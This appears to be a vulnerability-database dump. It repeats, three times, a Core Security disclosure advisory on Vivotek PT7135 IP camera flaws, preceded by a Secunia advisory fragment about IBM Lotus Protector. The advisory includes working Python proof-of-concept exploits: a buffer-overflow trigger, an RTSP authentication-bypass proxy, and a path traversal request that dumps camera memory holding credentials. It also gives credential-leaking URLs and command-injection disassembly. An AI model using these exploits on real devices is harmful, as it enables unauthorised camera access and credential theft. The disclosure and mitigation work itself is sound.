http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness has been reported in IBM Lotus Protector for Mail
Security, which can be exploited by malicious users to disclose
potentially sensitive information.
Certain input to the management interface is not properly verified
before being used to display files. This can be exploited to disclose
the contents of arbitrary files.
Successful exploitation requires access to the administrative user
interface (UI).
The weakness is reported in versions 2.5, 2.5.1, and 2.8.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
IBM:
http://www.ibm.com/support/docview.wss?uid=swg21605199
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-202001-0837 | CVE-2013-1597 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A Directory Traversal vulnerability exists in Vivotek PT7135 IP Cameras 0300a and 0400a via a specially crafted GET request, which could let a malicious user obtain user credentials. Vivotek PT7135 IP Camera Contains a path traversal vulnerability.Information may be obtained. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS. Multiple Vivotek IP Camera products are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com
Vivotek IP Cameras Multiple Vulnerabilities
1. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. *Vulnerability Description*
Multiple vulnerabilities have been found in Vivotek IP cameras [1] (and
potentially cameras from other vendors sharing the affected firmware)
that could allow an unauthenticated remote attacker:
1. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0836 | CVE-2013-1596 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Authentication Bypass Vulnerability exists in Vivotek PT7135 IP Camera 0300a and 0400a via specially crafted RTSP packets to TCP port 554. Vivotek PT7135 IP Camera Contains an authentication vulnerability.Information may be obtained. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0838 | CVE-2013-1598 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
A Command Injection vulnerability exists in Vivotek PT7135 IP Cameras 0300a and 0400a via the system.ntp parameter to the farseer.out binary file, which cold let a malicious user execute arbitrary code. Vivotek PT7135 IP Camera In OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS.
Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
